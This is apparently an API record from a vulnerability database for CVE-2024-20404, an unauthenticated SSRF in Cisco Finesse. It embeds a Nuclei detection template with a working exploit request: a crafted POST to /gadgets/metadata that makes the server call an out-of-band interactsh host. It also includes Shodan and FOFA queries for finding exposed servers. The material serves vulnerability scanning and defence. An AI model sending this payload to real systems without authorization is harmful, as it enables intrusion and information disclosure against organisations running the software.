{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2024-20404/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2024-20404/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2024-20404/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2024-20404/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2024-20404/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2024-20404"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2024-20404"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2024/CVE-2024-20404.yaml",
    "nuclei_template_severity": "medium",
    "nuclei_template_yaml": "id: CVE-2024-20404\n\ninfo:\n  name: Cisco Finesse - Server-Side Request Forgery (SSRF)\n  author: 0x_Akoko\n  severity: medium\n  description: |\n    Cisco Finesse contains an SSRF caused by insufficient validation of user-supplied input in HTTP requests, letting unauthenticated remote attackers access limited sensitive information, exploit requires sending crafted HTTP requests.\n  impact: |\n    Attackers can access sensitive information from services associated with the device, potentially leading to information disclosure.\n  remediation: |\n    Apply the latest security patches and updates provided by Cisco for Finesse.\n  reference:\n    - https://github.com/3zz4t/CVE-2024-20404\n    - https://nvd.nist.gov/vuln/detail/CVE-2024-20404\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N\n    cvss-score: 5.8\n    cve-id: CVE-2024-20404\n    epss-score: 0.22644\n    epss-percentile: 0.97643\n    cwe-id: CWE-918\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query: title:\"Cisco Finesse\" port:8445\n    fofa-query: title=\"Cisco Finesse\" && port=\"8445\"\n  tags: cve,cve2024,cisco,finesse,ssrf,unauth,oob,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /gadgets/metadata HTTP/1.1\n        Host: {{Hostname}}\n\n        {\"context\":{\"container\":\"default\",\"language\":\"en\",\"country\":\"US\",\"locale\":\"en_US\"},\"gadgets\":[{\"url\":\"http://{{interactsh-url}}\"}]}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(content_type, \"application/json\")'\n          - 'contains(interactsh_protocol, \"http\")'\n          - 'contains(body, \"At least 1 ModulePrefs is required\")'\n          - 'status_code == 200'\n        condition: and\n# digest: 4a0a00473045022020ada67c79e0a19487ded736355b83fc5cf66ef87742081ade21fabc0443b262022100d099a6e969225256122603d6e13a482bf3a24dbdc67606f5d41528cf4bba578f:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2024-20404"
}